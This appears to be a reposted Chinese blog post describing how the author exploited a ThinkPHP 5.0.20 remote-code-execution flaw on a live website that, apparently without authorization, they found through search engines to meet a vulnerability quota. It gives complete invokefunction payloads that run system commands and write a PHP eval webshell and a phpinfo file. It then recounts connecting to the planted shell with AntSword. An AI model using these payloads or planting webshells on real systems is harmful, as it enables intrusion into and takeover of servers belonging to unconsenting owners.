首页 > Web开发 > 详细

thinkPHP5.0.20的漏洞复现

时间:2021-07-13 15:00:43      阅读:17      评论:0      收藏:0      [点我收藏+]

上级要求每天找三个漏洞,本人太菜,只能看漏洞库,各种百度找站来搞。本来想找SQL注入的站,于是fofa找header="admin.php",奈何找不到,倒是看到很多站显示Copyright H-UI ADMIN啥的,于是在百度上试试搜索Copyright H-UI ADMIN,无意间发现一个这样的站:

技术分享图片

 

 

发现不存在注入,问了大佬,大佬试了下,说是thinkPHP框架,于是百度thinkPHP相关漏洞,找到一些验证的POC,尝试:

/index.php/index/index/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir

技术分享图片

 

 

 

是thinkPHP5.0.20:

技术分享图片

 

 

 

大佬说这个版本的可以getshell,让我们尝试getshell,但需要绕过限制啥的。但是我太菜了,只有百度各种thinkPHP5.0.20的getshell,找到一个:

/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=test.php&vars[1][]=<?php highlight_file(__FILE__);@eval($_POST[sss]);?>

直接添加到网站后访问:

返回了个数字:

技术分享图片

 

 

 

 

 

 

 

 

 

 

然后以为是错的,然后没再继续了。。。。。

后面请教了同事,同事说,是访问写入的文件:/test.php

于是再次尝试访问,可能是网络原因,或者IP被封了,并没有访问到,用蚁剑也连接不上:

技术分享图片

 

 

 

技术分享图片

 

 

 技术分享图片

 

 

 

 

 

以为写入失败了,请教了大佬,大佬说,看PHP执行系统命令的函数有哪些,于是又各种百度,无果。。。。

PHP命令执行函数参考链接:

https://mrxn.net/hacktools/618.html
https://blog.csdn.net/weixin_37557729/article/details/107012128?utm_term=php%E6%9F%A5%E7%9C%8B%E7%A6%81%E6%AD%A2%E7%9A%84%E5%87%BD%E6%95%B0&utm_medium=distribute.pc_aggpage_search_result.none-task-blog-2~all~sobaiduweb~default-1-107012128&spm=3001.4430
https://blog.csdn.net/qq15577969/article/details/108994794
https://blog.csdn.net/whatday/article/details/106985758
https://blog.csdn.net/weixin_33815613/article/details/93028960

 

由于急于交漏洞,想着能证明phpinfo的应该也行:

/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=test3.php&vars[1][]=<?php phpinfo();?>

技术分享图片

 

 

 

就准备查询域名的相关厂商信息,然后提交漏洞,然而搜不到厂商信息,于是只好去找其他的站了。。。。

不过,第二天再次去尝试用蚁剑连接时,结果成功了:

技术分享图片

 

 

技术分享图片

 

第二天连的时候,有使用代理,所以猜测是网络问题。

 

thinkPHP5.0.20的漏洞复现

原文:https://www.cnblogs.com/sysadmin32/p/15005722.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!